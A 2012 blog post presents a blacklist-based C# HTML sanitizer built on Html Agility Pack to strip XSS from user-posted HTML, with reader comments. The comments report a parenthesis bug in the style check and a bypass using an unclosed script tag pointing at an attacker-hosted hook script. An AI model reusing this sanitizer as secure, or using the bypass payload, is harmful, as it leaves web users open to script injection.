.NET HTML Sanitation for rich HTML Input

July 19, 2012 • from Maui, Hawaii • 20 comments

On this page:

Recently I was working on updating a legacy application to MVC 4 that included free form text input. When I set up the new site my initial approach was to not allow any rich HTML input, only simple text formatting that would respect a few simple HTML commands for bold, lists etc. and automatically handles line break processing for new lines and paragraphs. This is typical for what I do with most multi-line text input in my apps and it works very well with very little development effort involved.

Then the client sprung another note: Oh by the way we have a bunch of customers (real estate agents) who need to post complete HTML documents. Oh uh! There goes the simple theory. After some discussion and pleading on my part 😢 to try and avoid this type of raw HTML input because of potential XSS issues, the client decided to go ahead and allow raw HTML input anyway.

XSS

There has been lots of discussions on this subject on StackOverFlow (and here and here) but to after reading through some of the solutions I didn't really find anything that would work even closely for what I needed. Specifically we need to be able to allow just about any HTML markup, with the exception of script code. Remote CSS and Images need to be loaded, links need to work and so. While the 'legit' HTML posted by these agents is basic in nature it does span most of the full gamut of HTML (4). Most of the solutions XSS prevention/sanitizer solutions I found were way to aggressive and rendered the posted output unusable mostly because they tend to strip any externally loaded content.

In short I needed a custom solution. I thought the best solution to this would be to use an HTML parser - in this case the Html Agility Pack - and then to run through all the HTML markup provided and remove any of the blacklisted tags and a number of attributes that are prone to JavaScript injection.

There's much discussion on whether to use blacklists vs. whitelists in the discussions mentioned above, but I found that whitelists can make sense in simple scenarios where you might allow manual HTML input, but when you need to allow a larger array of HTML functionality a blacklist is probably easier to manage as the vast majority of elements and attributes could be allowed. Also white listing gets a bit more complex with HTML5 and the new proliferation of new HTML tags and most new tags generally don't affect XSS issues directly. Pure whitelisting based on elements and attributes also doesn't capture many edge cases (see some of the XSS cheat sheets listed below) so even with a white list, custom logic is still required to handle many of those edge cases.

The Microsoft Web Protection Library (AntiXSS)

My first thought was to check out the Microsoft AntiXSS library. Microsoft has an HTML Encoding and Sanitation library in the Microsoft Web Protection Library (formerly AntiXSS Library) on CodePlex, which provides stricter functions for whitelist encoding and sanitation. Initially I thought the Sanitation class and its static members would do the trick for me,but I found that this library is way too restrictive for my needs. Specifically the Sanitation class strips out images and links which rendered the full HTML from our real estate clients completely useless. I didn't spend much time with it, but apparently I'm not alone if feeling this library is not really useful without some way to configure operation.

To give you an example of what didn't work for me with the library here's a small and simple HTML fragment that includes script, img and anchor tags. I would expect the script to be stripped and everything else to be left intact. Here's the original HTML:

string value = "<b>Here</b> <script>alert('hello')</script> we go. Visit the " +
            "<a href='http://west-wind.com'>West Wind</a> site. " +
            "<img src='http://west-wind.com/images/new.gif' /> ";

and the code to sanitize it with the AntiXSS Sanitize class:

@Html.Raw(Microsoft.Security.Application.Sanitizer.GetSafeHtmlFragment(value))

This produced a not so useful sanitized string:

Here we go. Visit the West Wind site.

While it removed the <script> tag (good) it also removed the href from the link and the image tag altogether (bad). In some situations this might be useful, but for most tasks I doubt this is the desired behavior. While links can contain javascript: references and images can 'broadcast' information to a server, without configuration to tell the library what to restrict this becomes useless to me. I couldn't find any way to customize the white list, nor is there code available in this 'open source' library on CodePlex.

Using Html Agility Pack for HTML Parsing

The WPL library wasn't going to cut it. After doing a bit of research I decided the best approach for a custom solution would be to use an HTML parser and inspect the HTML fragment/document I'm trying to import. I've used the HTML Agility Pack before for a number of apps where I needed an HTML parser without requiring an instance of a full browser like the Internet Explorer Application object which is inadequate in Web apps. In case you haven't checked out the Html Agility Pack before, it's a powerful HTML parser library that you can use from your .NET code. It provides a simple, parsable HTML DOM model to full HTML documents or HTML fragments that let you walk through each of the elements in your document. If you've used the HTML or XML DOM in a browser before you'll feel right at home with the Agility Pack.

Blacklist based HTML Parsing to strip XSS Code

For my purposes of HTML sanitation, the process involved is to walk the HTML document one element at a time and then check each element and attribute against a blacklist. There's quite a bit of argument of what's better: A whitelist of allowed items or a blacklist of denied items. While whitelists tend to be more secure, they also require a lot more configuration. In the case of HTML5 a whitelist could be very extensive. For what I need, I only want to ensure that no JavaScript is executed, so a blacklist includes the obvious <script> tag plus any tag that allows loading of external content including <iframe>, <object>, <embed> and <link> etc. <form> is also excluded to avoid posting content to a different location. I also disallow <head> and <meta> tags in particular for my case, since I'm only allowing posting of HTML fragments. There is also some internal logic to exclude some attributes or attributes that include references to JavaScript or CSS expressions.

The default tag blacklist reflects my use case, but is customizable and can be added to.

Here's my HtmlSanitizer implementation:

using System.Collections.Generic;
using System.IO;
using System.Xml;
using HtmlAgilityPack;

namespace Westwind.Web.Utilities
{
    public class HtmlSanitizer
    {

        public HashSet<string> BlackList = new HashSet<string>() 
        {
                { "script" },
                { "iframe" },
                { "form" },
                { "object" },
                { "embed" },
                { "link" },                
                { "head" },
                { "meta" }
        };

        /// <summary>
        /// Cleans up an HTML string and removes HTML tags in blacklist
        /// </summary>
        /// <param name="html"></param>
        /// <returns></returns>
        public static string SanitizeHtml(string html, params string[] blackList)
        {
            var sanitizer = new HtmlSanitizer();
            if (blackList != null && blackList.Length > 0)
            {
                sanitizer.BlackList.Clear();
                foreach (string item in blackList)
                    sanitizer.BlackList.Add(item);
            }
            return sanitizer.Sanitize(html);
        }

        /// <summary>
        /// Cleans up an HTML string by removing elements
        /// on the blacklist and all elements that start
        /// with onXXX .
        /// </summary>
        /// <param name="html"></param>
        /// <returns></returns>
        public string Sanitize(string html)
        {
            var doc = new HtmlDocument();
            
            doc.LoadHtml(html);            
            SanitizeHtmlNode(doc.DocumentNode);            
            
            //return doc.DocumentNode.WriteTo();

            string output = null;

            // Use an XmlTextWriter to create self-closing tags
            using (StringWriter sw = new StringWriter())
            {
                XmlWriter writer = new XmlTextWriter(sw);
                doc.DocumentNode.WriteTo(writer);
                output = sw.ToString();

                // strip off XML doc header
                if (!string.IsNullOrEmpty(output))
                {
                    int at = output.IndexOf("?>");
                    output = output.Substring(at + 2);
                }

                writer.Close();
            }
            doc = null;

            return output;
        }

        private void SanitizeHtmlNode(HtmlNode node)
        {
            if (node.NodeType == HtmlNodeType.Element)
            {
                // check for blacklist items and remove
                if (BlackList.Contains(node.Name))
                {
                    node.Remove();
                    return;
                }

                // remove CSS Expressions and embedded script links
                if (node.Name == "style")
                {
                    if (string.IsNullOrEmpty(node.InnerText))
                    {
                        if (node.InnerHtml.Contains("expression") || node.InnerHtml.Contains("javascript:"))
                            node.ParentNode.RemoveChild(node);
                    }
                }

                // remove script attributes
                if (node.HasAttributes)
                {
                    for (int i = node.Attributes.Count - 1; i >= 0; i--)
                    {
                        HtmlAttribute currentAttribute = node.Attributes[i];
                 
                        var attr = currentAttribute.Name.ToLower();
                        var val = currentAttribute.Value.ToLower();
                        
                        span style="background: white; color: green">// remove event handlers
                        if (attr.StartsWith("on"))
                            node.Attributes.Remove(currentAttribute);
                        
                        // remove script links
                        else if (
                                 //(attr == "href" || attr== "src" || attr == "dynsrc" || attr == "lowsrc") &&
                                 val != null &&
                                 val.Contains("javascript:"))
                            node.Attributes.Remove(currentAttribute);
                        
                        // Remove CSS Expressions
                        else if (attr == "style" && 
                                 val != null &&
                                 val.Contains("expression") || val.Contains("javascript:") || val.Contains("vbscript:"))
                            node.Attributes.Remove(currentAttribute);
                    }
                }
            }

            // Look through child nodes recursively
            if (node.HasChildNodes)
            {
                for (int i = node.ChildNodes.Count - 1; i >= 0; i--)
                {
                    SanitizeHtmlNode(node.ChildNodes[i]);
                }
            }
        }
    }
}

Please note: Use this as a starting point only for your own parsing and review the code for your specific use case! If your needs are less lenient than mine were you can you can make this much stricter by not allowing src and href attributes or CSS links if your HTML doesn't allow it. You can also check links for external URLs and disallow those - lots of options. The code is simple enough to make it easy to extend to fit your use cases more specifically. It's also quite easy to make this code work using a WhiteList approach if you want to go that route. The code above is semi-generic for allowing full featured HTML fragments that only disallow script related content.

The Sanitize method walks through each node of the document and then recursively drills into all of its children until the entire document has been traversed. Note that the code here uses an XmlTextWriter to write output - this is done to preserve XHTML style self-closing tags which are otherwise left as non-self-closing tags.

The sanitizer code scans for blacklist elements and removes those elements not allowed. Note that the blacklist is configurable either in the instance class as a property or in the static method via the string parameter list. Additionally the code goes through each element's attributes and looks for a host of rules gleaned from some of the XSS cheat sheets listed at the end of the post. Clearly there are a lot more XSS vulnerabilities, but a lot of them apply to ancient browsers (IE6 and versions of Netscape) - many of these glaring holes (like CSS expressions - WTF IE?) have been removed in modern browsers.

What a Pain

To be honest this is NOT a piece of code that I wanted to write. I think building anything related to XSS is better left to people who have far more knowledge of the topic than I do. Unfortunately, I was unable to find a tool that worked even closely for me, or even provided a working base. For the project I was working on I had no choice and I'm sharing the code here merely as a base line to start with and potentially expand on for specific needs. It's sad that Microsoft Web Protection Library is currently such a train wreck - this is really something that should come from Microsoft as the systems vendor or possibly a third party that provides security tools.

Luckily for my application we are dealing with authenticated and validated users so the user base is fairly well known, and relatively small - this is not a wide open Internet application that's directly public facing. As I mentioned earlier in the post, if I had my way I would simply not allow this type of raw HTML input in the first place, and instead rely on a more controlled HTML input mechanism like MarkDown or even a good HTML Edit control that can provide some limits on what types of input are allowed. Alas in this case I was overridden and we had to go forward and allow any raw HTML posted.

Sometimes I really feel sad that it's come this far - how many good applications and tools have been thwarted by fear of XSS (or worse) attacks? So many things that could be done if we had a more secure browser experience and didn't have to deal with every little script twerp trying to hack into Web pages and obscure browser bugs. So much time wasted building secure apps, so much time wasted by others trying to hack apps… We're a funny species - no other species manages to waste as much time, effort and resources as we humans do 😃

Resources

The Voices of Reason

Jamie
July 19, 2012

# re: .NET HTML Sanitation for rich HTML Input

Check out my project CsQuery: https://github.com/jamietre/CsQuery as an alternative to HTML agility pack. This is a complete port of jQuery which was designed with real-time HTML parsing in mind - it builds an index of the document so selectors are extremely fast. Using CSS selectors and the jQuery API via CsQuery, the code can be a good bit simpler

    CQ doc = CQ.Create(html);
 
    string selector = String.Join(",",BlackList); // "iframe, form, ..."
    
    // CsQuery uses the property indexer as a default method, it's identical 
    // to the "Select" method and functions like $(...)
 
    doc[selector].Remove();
    doc["style:contains('expression'),style:contains('javascript:')].Remove();

For testing script attributes, there's no native jQuery way to evaluate an attribute name itself, so that part wouldn't be all that different: you would still have to look through everything to do it without enumerating all the possible "onxxx" values. I'd probably use linq and do something like this:

// testing the contents of "style" attribute is easy
 
doc["[style*='expression'],[style*='vbscript:']"].Remove();
 
// testing attribute name itself requires looking at each element
 
IEnumerable<IDomObject> elements = doc["*"].Where(item =>
    item.Attributes.Where(attr => 
        attr.Key.StartsWith("on") ||
        attr.Value.Contains("javascript:") 
    ).Any()
);
 
// "elements" is an enumeration of elements, it's not a CQ object any more. Same is 
// if you pulled the DOM elements out of a jQuery object. So wrap the sequence of 
// elements in a new CQ object, like $(elements)... and remove them
 
new CQ(elements).Remove();

It would be more efficient to enumerate all the possible event attribute names, though, since CsQuery would be able to use the index to locate them. This probably would make very little difference when talking about the amount of content likely to be submitted through a form, but if you were processing big documents from a CMS or something, it could.

There is also an API for creating custom filter-type selectors as in jQuery, but doing this as a one-off in LINQ is easy enough.

Rick Strahl
July 19, 2012

# re: .NET HTML Sanitation for rich HTML Input

@Jamie - that looks great. I've been meaning to take a look at your library but hadn't had time. This might be a good chance to do so. Looks cleaner, but have to do some testing to see what happens to the output document. Thanks for the reminder :-)

Jamie
July 19, 2012

# re: .NET HTML Sanitation for rich HTML Input

Oh, I didn't realize I'd mentioned it here before! Yeah, I have put a lot of work in to cleaning up some old messy code, organizing, and documenting. The vast majority of the public API has clean XML docs now. There's still some work to do with the lower level stuff, but it's definitely much improved from a few months ago. There's a small but growing continent of active users which has been very helpful for finding bugs.

Now about that web site...

Harry McIntyre
July 19, 2012

# re: .NET HTML Sanitation for rich HTML Input

The Google Caja project has a good sanitiser (http://code.google.com/p/google-caja/wiki/JsHtmlSanitizer) - running it via IronJS or Jusassic would probably do a decent job.

Damian Edwards
July 20, 2012

# re: .NET HTML Sanitation for rich HTML Input

Worth mentioning http://markupsanitizer.codeplex.com as an alternative library. This came out of a project I worked on a while back and worked very well for us in cleaning content provided by content managers in the company (often pasted from Word, etc.).

David Elyk
July 20, 2012

# re: .NET HTML Sanitation for rich HTML Input

Is it possible to approach this a different way?

I don't have any code to support the theory but i think its doable.

A separate app or process to sandbox the html request and return the result. A mini firewall if you will.

It would eliminate the need to check input or sanitize XSS.

Could be as simple as a Web Service with one method, or an HTTP handler maybe, the main idea being that it is isolated from the database and file system of the main application.

Siderite
July 22, 2012

# re: .NET HTML Sanitation for rich HTML Input

I had personal experiences with Microsoft's AntiXSS library and, right now, I wouldn't recommend it. First of all, it assumes that you are sanitising HTML, not a text input. That means ampersands and other characters may get HTML encoded and (which I found worst of all) that the library can add random new lines in your input, as they wouldn't count in HTML. I had a bug to fix where in a long list of checkboxes, at a regular interval, some checkboxes would not get checked. The reason was that the input sent with the request was larger than 256 characters and AntiXSS would word wrap at around that size, adding new lines in the values of checkbox input and thus changing them beyond recognition.

Eva
July 25, 2012

# re: .NET HTML Sanitation for rich HTML Input

You might consider looking at this https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project_.NET

It's a far more effective white list approach than the microsoft version.

Owasp tend to be pretty good at what they do.

Asif Hossain Shantu
October 23, 2012

# re: .NET HTML Sanitation for rich HTML Input

Hi,
It works great with HTMLs Texts. But problem exists with the texts copied from Microsoft office document because it contains some strange encoding that you already know. Do you have any solution for this ?
___________________Copied from MS Word__________________

<html xmlns:v=3D"urn:schemas-microsoft-com:vml" xmlns:o=3D"urn:schemas-micr=
osoft-com:office:office" xmlns:w=3D"urn:schemas-microsoft-com:office:word" =
xmlns:m=3D"http://schemas.microsoft.com/office/2004/12/omml" xmlns=3D"http:=
//www.w3.org/TR/REC-html40"><head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DWindows-1=
252"><meta name=3D"Generator" content=3D"Microsoft Word 12 (filtered medium=
)"><style></style></head><body lang=3D"DE" link=3D"blue" vl=
ink=3D"purple"><div class=3D"WordSection1"><p class=3D"MsoNormal">
_________________________
Output using your sanitizer contains a lot of

michael freidgeim
April 04, 2013

# re: .NET HTML Sanitation for rich HTML Input

Your https://github.com/RickStrahl/HtmlSanitizer should have link back to this post.

Kevin
April 07, 2013

# re: .NET HTML Sanitation for rich HTML Input

Hello, I am using your code above with TinyMCE to sanitize the HTML on the server side since I have to disable request validation to allow users to post the TinyMCE html. I am finding that any extra spaces the user adds end up with &nbsp; such that the nbsp; is visible instead of being another space. I'd like to allow the users to use multiple spaces together if they wish. Are you able to offer any ideas of how I can get it to leave nbsp; alone?

Kevin
April 07, 2013

# re: .NET HTML Sanitation for rich HTML Input

Thank you so much for this article! I had tried the .net version of antisamy and just hated it; couldn't get it to work. This worked great for my purposes and was easy to understand and implement even though I had not used htmlAgilityPack before.

BTW, I'm not sure if it is the right way to go about it, but I fixed the "&nbsp;" issue with a string.Replace("&nbsp;"," ") after it ran through the sanitizer. That worked fine.

Anyway, thanks again.

Rasmus
July 11, 2013

# re: .NET HTML Sanitation for rich HTML Input

Good solution with nice tradeoffs between simplicity and functionality. A black list always spurs some anxiety, but reason seems valid given the html requirements, as always.

You are missing a couple of parentheses around //Remove CSS Expressions parts. Result is potential null ptr exception and also the logic seems slightly off compared to comment. Suggested change (based on github code which has similar issues):

// remove event handlers
if (attr.StartsWith("on"))
    node.Attributes.Remove(currentAttribute);
 
// Remove CSS Expressions
else if (attr == "style" && val != null && HasExpressionLinks(val))
    node.Attributes.Remove(currentAttribute);
 
// remove script links from all attributes
else if (val != null && HasScriptLinks(val))
    node.Attributes.Remove(currentAttribute);

casper
October 08, 2013

# re: .NET HTML Sanitation for rich HTML Input

To enable HTML markup on to the texts that we enter is quite a difficult task . Here I got to read about the fact of data overflow and the html enrich tags that we use while commenting. Good article and keep sharing.
http://www.educationalstar.com

Rob
April 30, 2014

# re: .NET HTML Sanitation for rich HTML Input

The only really secure way is to do this is to implement a Content Security Policy (http://www.html5rocks.com/en/tutorials/security/content-security-policy/) for any page where user controlled content is output. This can prevent any inline scripting from executing, whilst allowing trusted sources such as

<script src="//ajax.googleapis.com/ajax/libs/jqueryui/1.10.4/jquery-ui.min.js"></script>

or script from relative URLs:

<script src="/scripts/myJavascript.js"></script>

Browser support is good (http://caniuse.com/contentsecuritypolicy) and you can combine it with a HTML sanitiser to prevent anything slipping through the cracks.

As HTML, JavaScript, CSS and other web technologies develop, there will always be ways to bypass sanitizers. See this answer too: http://security.stackexchange.com/a/49342/8340

Jonn
June 23, 2014

# re: .NET HTML Sanitation for rich HTML Input

Codes broken. If you don't close the tag, it isn't parsed properly and then it gets closed off for me. For example:

<script src="attacker.com/beefhook.js"

Is allowed through (and the src attribute is doubled for some reason) with /> appended to the end to make it a valid tag.

Cerek
February 10, 2016

# re: .NET HTML Sanitation for rich HTML Input

With AntiXss abandoned, thought I'd share this library that is currently in active development, coincidentally(?) having the same name as Rick's attempt...

https://github.com/mganss/HtmlSanitizer

p/s thank you for a completely pain-free commenting system!

Christ
August 08, 2016

# re: .NET HTML Sanitation for rich HTML Input

I really liked your approach but opted for a white list approach. In addition I wanted to ensure that my application ended up with a well known subset of HTML5 while at the same time being flexible with input. A 'b' tag should for example become a 'strong' tag. Enforcing attribute values like rel="nofollow" is included as well.

https://github.com/Vereyon/HtmlRuleSanitizer

Thanks for providing the original inspiration on the approach of sanitizing an HTML document!

Grietver
July 27, 2018

# re: .NET HTML Sanitation for rich HTML Input

Markdown is mentioned at the end of the article, but that is not going to solve the sanitation issue. There are valid Markdown constructs that lead to dangerous HTML when rendered in a browser. In fact, here is a harmless example entered in Markdown and shown here in HTML:

Click me

Markdown is inherently unsafe and also requires server side sanitation on the output HTML. That would have prevented the above (harmless) link 😉

Rick Strahl
July 29, 2018

# re: .NET HTML Sanitation for rich HTML Input

@Grietver - that depends on the Markdown parser in use. Most Markdown parsers have options to disable script code or disallow HTML tags altogether.

Rick Strahl's Weblog